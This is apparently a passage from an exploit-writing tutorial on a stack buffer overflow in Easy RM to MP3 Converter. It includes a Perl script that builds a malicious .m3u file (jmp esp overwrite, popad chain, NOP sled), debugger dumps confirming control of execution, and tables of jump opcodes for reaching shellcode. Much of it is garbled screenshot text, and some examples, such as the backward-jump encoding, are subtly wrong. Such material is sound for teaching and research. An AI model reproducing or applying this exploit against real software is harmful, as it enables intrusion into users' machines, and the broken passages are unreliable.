000ff7a0	00	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	. AAAAAAAAAAAAAAAAA	=>	garbage
b <000:0		•	•	•	•	•	•				•	•	•	•				garbage
000ff7b0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff7c0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff7d0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff7e0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff7f0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff800	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff810	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
000ff820	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	garbage
0:000> d																		
000ff830	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AAAAAAAAAAAAAAAAAA	=>	garbage
000ff840	41	41	90	90	90	90	90	90-90	90	90	90	90	90	90	90	ΑΑ	=>	garbage
000ff850	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90		=>	NOPS/Shellcode
000ff860	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90		=>	NOPS/Shellcode
00011870	90	90	90	90	CC	41	41	41-41	41	41	41	41	41	41	41		=>	NOPS/Shellcode
00011880	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ	=>	NUPS/Shellcode
JUUT1890	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AAAAAAAAAAAAAAAAAAA	=>	NUPS/Snellcode
00011880	4	41	41	41	41	41	41	4 - 4	41	41	41	41	41	41	41		=>	NUPS/Shellcode

Let's pretend that we need to use the 13 X's (so 13 bytes) that are available directly at ESP to jump over 100 D's (44) and 160 A's (so a total of 260 bytes) to end up at our shellcode (starts with NOPs, then a breakpoint, and then A's (=shellcode))

One popad = 32 bytes. So 260 bytes = 9 popad's (-28 bytes)

(so we need to start our shellcode with nops, or start the shellcode at [start of shellcode]+28 bytes

In our case, we have put some nops before the shellcode, so let's try to "popad" into the nops and see if the application breaks at our breakpoint.

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First, overwrite EIP again with imp esp. (see one of the previous exploit scripts)

Then, instead of the X's, perform 9 popad's, followed by "jmp esp" opcode (0xff,0xe4)

my \$file= "test1.m3u"; my \$buffersize = 26094;

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my \$junk= "A" x 250; my \$nop = "\x90" x 50; my \$shellcode = "\xcc";

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e

my \$restofbuffer = "A" x (\$buffersize-(length(\$junk)+length(\$nop)+length(\$shellcode)));

my \$eip = pack('V',0x01ccf23a); #jmp esp from MSRMCcodec02.dll

my \$preshellcode = "X" x 4; # needed to point ESP at next 13 bytes below \$preshellcode=\$preshellcode."\x61" x 9; #9 popads \$preshellcode=\$preshellcode."\xff\xe4"; #10th and 11th byte, jmp esp \$preshellcode=\$preshellcode."\x90\x90\x90"; #fill rest with some nops

my \$garbage = "\x44" x 100; #garbage to jump over

my \$buffer = \$junk.\$nop.\$shellcode.\$restofbuffer;

print "Size of buffer : ".length(\$buffer)."\n";

open(\$FILE,">\$file");
print \$FILE \$buffer.\$eip.\$preshellcode.\$garbage;
close(\$FILE);
print "m3u File Created successfully\n";

After opening the file, the application does indeed break at the breakpoint. EIP and ESP look like this :

(f40.5f0): Break instruction exception - code 80000003 (first chance) eax=90909090 ebx=90904141 ecx=90909090 edx=90909090 esi=41414141 edi=41414141 eip=000ff874 esp=000ff850 ebp=41414141 iop1=0 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 nv up ei pl nz na pe nc efl=00000206 Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. <Unloaded_P32.dll>+0xff863: 000ff874 cc 0001107-0:000> d eip int 3 . AAAAAAAAAAAAAAA 000ff884 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 41 41 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff894 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8a4 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8b4 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8c4 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8d4 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8e4 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 0:000> d eip-32 000ff842 000ff852 $90 \hspace{0.1in} 90 \hspace$ 000ff862 000ff872 ΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff882 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff892 000ff8a2 ΔΑΔΑΔΑΔΑΔΑΔΑΔΑΔΑΔΑ 000ff8b2 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 0:000> d esp 000ff850 000ff860 000ff870 90 90 90 90 **cc** 41 41 41-41 41 41 41 41 41 41 41 41 . AAAAAAAAAAA 000ff880 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff890 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8a0 ΔΑΔΑΔΑΔΑΔΑΔΑΔΑΔΑΔΑ 000ff8b0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ

=> the popad's have worked and made esp point at the nops. Then the jump to esp was made (0xff 0xe4), which made EIP jump to nops, and slide to the breakpoint (at 000f874)

Replace the A's with real shellcode :

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File Edit Vew Debug Window Hele
The second se
Command - TC Program File Edt Vew Help Process Laboration Laboratio Laboratio
RodLoad: 77b20000 77b3 0
ModLoed 66280000 6630
NodLoad 718/0000 718/7 [0p.d1]
ModLoad 747b000 747f Beckpee CE C 1041
ModLoad 78090000 7809
ModLoad 77c70000 77c9 MC 7 8 9 / and 8 d11
ModLoad: 76d60000 76d7 pi.d11
ModLoad: 77b40000 77b6
BodLoad: 76fd0000 7704 4 9 6 4 0 DLL
RodLoad: 77650000 7711
Noticed 77620000 7787 MS 1 2 3 - 10 (dil
BodLoad - 75510000 7591
BydLoad 2292000 22a1 Ma 0 w PI dil
BodLoad Sat70000 Sata
ModLoad: 76990000 769b5010 C:\VISCOW5\ayutes32\atshrus.dll
HodLoad: 76b20000 76b31000 C:\WINDOWS\myntem32\ATL.DLL
ModLoad: 7e290000 7e401000 C:>VIND0VS>system32>shdocvy.dll
ModLoad: 77a00000 77b15000 C:\VISDOWS\system32\CRTPT32.dll
BodLoed: 77520000 77532000 C: WISCONSAPUTER327/8536381.dl1
Noticed: 7540000 755000 C: VISCVS/WEIRS7/CHTP01.01
Noticed: 76:0000 76:bit Easy RM to MP3 Converter
ModLoad 76160000 7618
ModLoad: 74e30000 74e9d
(abc.920): Access viola
First chance exceptions
This exception may be d
eax+01010000 ebx+708039
exp-outrise exp-outris
Reside page ros
Kissing image mame, pos
Hissing isspe neae, possible paged-out or corrupt data.
<pre>(Unloaded_P32.d11)+0xff8c5:</pre>
000ff8d6 ac lods byte ptr [esi] ds:0023:c644d12e+??
L
<000:0

pnwed again !

Another (less preferred, but still possible) way to jump to shellcode is by using jumpcode that simply jumps to the address (or an offset of a register). Since the addresses/registers could vary during every program execution, this technique may not work every time.

So, in order to hardcode addresses or offsets of a register, you simply need to find the opcode that will do the jump, and then use that opcode in the smaller "first"/stage1 buffer, in order to jump to the real shellcode.

You should know by now how to find the opcode for assembler instructions, so I'll stick to 2 examples :

1. jump to 0x12345678

0:000> a 7c90120e jmp 12345678 jmp 12345678 7c901213 0:000> u 7c90120e ntdl!DbgBreakPoint: 7c90120e e96544a495 jmp 12345678

=> opcode is 0xe9,0x65,0x44,0xa4,0x95

2. jump to ebx+124h

0:000> a 7c901214 add ebx,124 add ebx,124 7c90121a jmp ebx 7c90121c

0:000> u 7c901214 ntdll!DbgUserBreakPoint+0x2: 7c901214 81c324010000 add ebx,124h 7c90121a ffe3 jmp ebx

=> opcodes are 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx 124h) and 0xff,0xe3 (jmp ebx)

Short jumps & conditional jumps

In the event you need to jump over just a few bytes, then you can use a couple 'short jump' techniques to accomplish this :

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- a short jump : (jmp) : opcode 0xeb, followed by the number of bytes

So if you want to jump 30 bytes, the opcode is 0xeb,0x1e

- a conditional (short/near) jump : ("jump if condition is met") : This technique is based on the states of one or more of the status flags in the EFLAGS register (CF,OF,PF,SF and ZF). If the flags are in the specified state (condition), then a jump can be made to the target instruction specified by the destination operand. This target instruction is specified with a relative offset (relative to the current value of EIP).

Example : suppose you want to jump 6 bytes : Have a look at the flags (ollydbg), and depending on the flag status, you can use one of the opcodes below Let's say the Zero flag is 1, then you can use opcode 0x74, followed by the number of bytes you want to jump (0x06 in our case)

This is a little table with jump opcodes and flag conditions :

Code	Mnemonic	Description
77 cb	JA rel8	Jump short if above (CF=0 and ZF=0)

73 cb	JAE rel8	Jump short if above or equal (CF=0)
72 cb	JB rel8	Jump short if below (CF=1)
76 cb	JBE rel8	Jump short if below or equal (CF=1 or ZF=1)
72 cb	JC rel8	Jump short if carry (CF=1)
E3 cb	JCXZ rel8	Jump short if CX register is 0
E3 cb	JECXZ rel8	Jump short if ECX register is 0
74 cb	JE rel8	Jump short if equal (ZF=1)
7F cb	JG rel8	Jump short if greater (ZF=0 and SF=OF)
7D cb	JGE rel8	Jump short if greater or equal (SF=OF)
7C cb	JL rel8	Jump short if less (SF<>OF)
7E cb	JLE rel8	Jump short if less or equal (ZF=1 or SF<>OF)
76 cb	JNA rel8	Jump short if not above (CF=1 or ZF=1)
72 cb	JNAE rel8	Jump short if not above or equal (CF=1)
73 cb	JNB rel8	Jump short if not below (CF=0)
77 cb	JNBE rel8	Jump short if not below or equal (CF=0 and ZF=0)
73 cb	JNC rel8	Jump short if not carry (CF=0)
75 cb	JNE rel8	Jump short if not equal (ZF=0)
7E cb	JNG rel8	Jump short if not greater (ZF=1 or SF<>OF)
7C cb	JNGE rel8	Jump short if not greater or equal (SF<>OF)
7D cb	JNL rel8	Jump short if not less (SF=OF)
7F cb	JNLE rel8	Jump short if not less or equal (ZF=0 and SF=OF)
71 cb	JNO rel8	Jump short if not overflow (OF=0)
7B cb	JNP rel8	Jump short if not parity (PF=0)
79 cb	JNS rel8	Jump short if not sign (SF=0)
75 cb	JNZ rel8	Jump short if not zero (ZF=0)
70 cb	JO rel8	Jump short if overflow (OF=1)
7A cb	JP rel8	Jump short if parity (PF=1)
7A cb	JPE rel8	Jump short if parity even (PF=1)
7B cb	JPO rel8	Jump short if parity odd (PF=0)
78 cb	JS rel8	Jump short if sign (SF=1)
74 cb	JZ rel8	Jump short if zero (ZF = 1)
0F 87 cw/cd	JA rel16/32	Jump near if above (CF=0 and ZF=0)
0F 83 cw/cd	JAE rel16/32	Jump near if above or equal (CF=0)
0F 82 cw/cd	JB rel16/32	Jump near if below (CF=1)
0F 86 cw/cd	JBE rel16/32	Jump near if below or equal (CF=1 or ZF=1)
0F 82 cw/cd	JC rel16/32	Jump near if carry (CF=1)
0F 84 cw/cd	JE rel16/32	Jump near if equal (ZF=1)
0F 84 cw/cd	JZ rel16/32	Jump near if 0 (ZF=1)
0F 8F cw/cd	JG rel16/32	Jump near if greater (ZF=0 and SF=OF)
0F 8D cw/cd	JGE rel16/32	Jump near if greater or equal (SF=OF)
0F 8C cw/cd	JL rel16/32	Jump near if less (SF<>OF)
0F 8E cw/cd	JLE rel16/32	Jump near if less or equal (ZF=1 or SF<>OF)
0F 86 cw/cd	JNA rel16/32	Jump near if not above (CF=1 or ZF=1)
0F 82 cw/cd	JNAE rel16/32	Jump near if not above or equal (CF=1)
0F 83 cw/cd	JNB rel16/32	Jump near if not below (CF=0)
0F 87 cw/cd	JNBE rel16/32	Jump near if not below or equal (CF=0 and ZF=0)
0F 83 cw/cd	JNC rel16/32	Jump near if not carry (CF=0)
0F 85 cw/cd	JNE rel16/32	Jump near if not equal (ZF=0)
OF 8E cw/cd	JNG rel16/32	Jump near if not greater (ZF=1 or SF<>OF)

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0F 8C cw/cd

JNGE rel16/32

Jump near if not greater or equal (SF<>OF)

0F 8D cw/cd	JNL rel16/32	Jump near if not less (SF=OF)
0F 8F cw/cd	JNLE rel16/32	Jump near if not less or equal (ZF=0 and SF=OF)
0F 81 cw/cd	JNO rel16/32	Jump near if not overflow (OF=0)
0F 8B cw/cd	JNP rel16/32	Jump near if not parity (PF=0)
0F 89 cw/cd	JNS rel16/32	Jump near if not sign (SF=0)
0F 85 cw/cd	JNZ rel16/32	Jump near if not zero (ZF=0)
0F 80 cw/cd	JO rel16/32	Jump near if overflow (OF=1)
0F 8A cw/cd	JP rel16/32	Jump near if parity (PF=1)
0F 8A cw/cd	JPE rel16/32	Jump near if parity even (PF=1)
0F 8B cw/cd	JPO rel16/32	Jump near if parity odd (PF=0)
0F 88 cw/cd	JS rel16/32	Jump near if sign (SF=1)
0F 84 cw/cd	JZ rel16/32	Jump near if 0 (ZF=1)

As you can see in the table, you can also do a short jump based on register ECX being zero. One of the Windows SEH protections (see part 3 of the tutorial series) that have been put in place is the fact that registers are cleared when an exception occurs. So sometimes you will even be able to use 0xe3 as jump opcode (if ECX = 00000000)

Note : You can find more/other information about making 2 byte jumps (forward and backward/negative jumps) at http://www.geocities.com/thestarman3/asm/2bytejumps.htm

Backward jumps

In the event you need to perform backward jumps (jump with a negative offset) : get the negative number and convert it to hex. Take the dword hex value and use that as argument to a jump (\xeb or \xe9)

Example : jump back 7 bytes : -7 = FFFFFF9, so jump -7 would be "\xeb\xf9\xff\xff"

Exampe : jump back 400 bytes : -400 = FFFFE70, so jump -400 bytes = "xe9x70xfexffxff" (as you can see, this opcode is 5 bytes long. Sometimes (if you need to stay within a dword size (4 byte limit), then you may need to perform multiple shorter jumps in order to get where you want to be)

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